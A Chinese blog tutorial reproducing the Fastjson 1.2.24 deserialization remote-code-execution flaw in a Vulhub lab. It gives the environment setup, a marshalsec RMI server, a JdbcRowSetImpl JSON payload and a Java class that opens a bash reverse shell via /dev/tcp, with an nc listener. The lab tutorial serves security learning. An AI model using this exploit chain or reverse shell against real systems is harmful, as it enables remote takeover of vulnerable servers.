FastJson1.2.24漏洞复现(详细步骤)

已于 2023-07-28 14:32:05 修改
阅读量377 收藏 4
点赞数 1
文章标签: 安全
于 2023-07-28 14:30:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35713681/article/details/131956684
版权

此测试用的是VM搭的Kali 2023.2,且在root用户下进行

https://kali.download/base-images/kali-2023.2/kali-linux-2023.2-vmware-amd64.7z

环境:

Java1.8:Index of java-local/jdk (huaweicloud.com)

创建目录

mkdir /usr/local/java

加载目录

cd /usr/local/java

下载文件

wget https://repo.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz

解压

tar -zxvf jdk-8u202-linux-x64.tar.gz

配置环境变量

vim /etc/profile

内容

export JAVA_HOME=/usr/local/java/jdk1.8.0_202
export PATH=$PATH:$HOME/bin:$JAVA_HOME/bin

更新软连接

update-alternatives --install "/usr/bin/java" "java" "/usr/local/java/jdk1.8.0_202/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "/usr/local/java/jdk1.8.0_202/bin/javac" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_202/bin/javaws" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_202/bin/javaws" 1

重新加载环境变量文件

source /etc/profile

变换java版本

update-alternatives --config java

查看版本,如图

maven(Maven – Welcome to Apache Maven)

创建目录

mkdir /usr/local/maven

加载目录

cd  /usr/local/maven

下载文件

wget https://dlcdn.apache.org/maven/maven-3/3.9.3/binaries/apache-maven-3.9.3-bin.tar.gz

解压

tar -zxvf apache-maven-3.9.3-bin.tar.gz

配置环境变量

vim /etc/profile

添加软连接

update-alternatives --install "/usr/bin/mvn" "mvn" "/usr/local/maven/apache-maven-3.9.3/bin/mvn" 1

重新加载环境变量文件

source /etc/profile

查看版本

mvn -version

Python3

(kali自带,没有的自行查询安装方法)

Docker

推荐方式

curl -s https://get.docker.com/ | sh

系统自带安装包

sudo apt install docker.io

(若报错请使用apt-update更新源后再执行)

Docker-Compose

未安装pip的先安装

curl -s https://bootstrap.pypa.io/get-pip.py | python3

安装D-C

pip install docker-compose

下述文件请放到方便的位置

Vulhub(Vulhub - Docker-Compose file for vulnerability environment)

下载文件

git clone https://github.com/vulhub/vulhub.git

Marshalsec

下载文件

wget https://codeload.github.com/mbechler/marshalsec/zip/refs/heads/master

漏洞复现

开启靶场环境

进入vulhub-master/fastjson/1.2.24-rce下

docker-compose up -d

打开浏览器输入ip+8090端口(如图为操作成功)

编写脚本并用Javac编译(文件名为Test.java,下述代码中class后面的词须与文件名一致,否则无法编译)

import java.lang.Runtime;
import java.lang.Process;

public class Test {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/welldone"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译

javac Test.java

开启监听(如图)

python -m http.server 1145

 

开启RMI监听

到marshalsec-master下执行

mvn clean package -DskipTests

执行成功,如下图

 到该文件夹的target下执行:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.195:1145/#Test" 9999

配置好浏览器代理并开启bp截获,刷新ip+8090端口的网址,将截获的包放到重放模块并放行截获的包。

在重放模块里替换以下代码(其中有两个标注ip的位置替换为你的ip)

POST / HTTP/1.1
Host: ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 158

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://ip:9999/Test",
        "autoCommit":true
    }
}

发送后的结果,

查看docker容器id为

docker ps

docker容器的执行命令为

docker exec -it ID bash

 反弹shell的方式

在vulhub-master/fastjson/1.2.24-rce下创建新的文件Shell.java(将下述ip的位置替换为你的ip)

import java.lang.Runtime;
import java.lang.Process;
 
public class Shell {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/ip/5145 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

对上述文件进行编译后开启监听

1.2.24下

python -m http.server 1145

target下

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.195:1145/#Shell" 9999

开新窗口监听5145端口(上述Java脚本的反弹shell设置的端口)

nc -lvvp 5145

继续用bp截包放到重放模块(上述截取到的也可以)

替换的payload如下

POST / HTTP/1.1
Host: 192.168.1.195:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 159

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.1.195:9999/Shell",
        "autoCommit":true
    }
}

发送包后的结果

 http服务端口需要匹配到RMI监听中,RMI监听端口需与payload中ip后的端口相对应,payload中的触发的文件需与脚本文件名对应

以上就是fastjson1.2.24的漏洞复现,过程中需要注意ip和端口是否填写正确。

以下为我复现参考的连接

Vulhub - Docker-Compose file for vulnerability environment

Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_fastjson漏洞原理_Bossfrank的博客-CSDN博客

本人小白,若有遗漏或错误请大佬指点:)

LeonFTW
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4483
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
fastjson 1.2.24漏洞复现
qq_18831583的博客
01-13 835
fastjson 1.2.24漏洞复现
fastjson_1.2.24和Shiro(CVE-2016-4437)漏洞复现
qq_55202378的博客
05-11 829
如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务端收到请求对rememberMe值,先base64解码然后AES解密再反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞。时,需要进行 base64 编码绕过检测(不编码,执行不了,已经试过了~):勾选记住密码选项后,点击登录,抓包,观察请求包中是否有。注意:这里java版本要用java8。,加一个环境变量,就可以用了~
fastJson1.2.24漏洞复现
@起风了的博客
05-06 725
背景 fastJson1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。 而作怪的就是这个AutoType 恶意类 public class Attack { public Attack() { try { //打开本地计算器 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(com
fastjson-1.2.24漏洞,搭建及复现,手把手图文教程
芜湖~米汤来喽~
10-04 1408
【代码】fastjson-1.2.24漏洞,搭建及复现,手把手图文教程。
Fastjson 1.2.24漏洞搭建及复现——详解
网安小白的博客
08-02 898
反序列化Fastjson1.2.24漏洞复现全过程,图文详解,包含复现过程中出现各种问题~
fastjson1.2.24反序列化RCE
最新发布
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
fastjson1.2.24含源码
02-04
《深入解析Fastjson 1.2.24Fastjson是阿里巴巴开发的一款高性能的Java JSON库,它具有极快的性能,广泛的功能以及简洁易用的API,使其在Java社区中广受欢迎。Fastjson 1.2.24版本是其发展过程中的一个重要里程碑...
fastjson-1.2.24.jar
02-24
java运行依赖jar包
fastjson1.2.24反序列化漏洞复现,验证JdbcRowSetImpl
liu649983697的专栏
05-30 1489
fastjson反序列化漏洞复现、实验、验证,远程命令调用、漏洞攻击
漏洞复现fastjson反序列化漏洞1.2.24/1.2.47
weixin_45556536的博客
11-04 826
fastjson-反序列化漏洞1.2.24/1.2.47基础知识漏洞原理影响版本复现思路复现Fastjson1.2.24复现Fastjson1.2.45/1.2.47 基础知识 Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 反序列化常用的两种利用方式,一种是基于rmi,一种是基于ldap。RMI是一种行为,指的是Java远程方法调用。 漏洞原理 Fas
【渗透测试漏洞复现fastjson1.2.24漏洞复现详细过程
GX233的博客
04-18 6510
fastjson1.2.24 RCE详细复现
Fastjson 1.2.24 反序列化漏洞复现
huangyongkang666的博客
04-15 3741
fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2537
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行。
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1128
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
【vulhub漏洞复现Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3678
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 397
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
fastjson1.2.24漏洞复现
07-27
对于Fastjson 1.2.24版本的漏洞复现,根据引用\[1\]和引用\[2\]的信息,该版本存在安全漏洞,攻击者可以利用fastjson autotype在处理json对象时,未对@type字段进行安全性验证,从而执行恶意代码。为了修复这个漏洞,建议升级到最新版本1.2.83safeMode加固,或者升级至Fastjson v2。\[3\]因此,如果你想复现Fastjson 1.2.24版本的漏洞,我建议你不要这样做,而是采取相应的安全措施来保护你的系统。 #### 引用[.reference_title] - *1* [FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)](https://blog.csdn.net/q943111495/article/details/121031753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)](https://blog.csdn.net/oiadkt/article/details/130103907)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值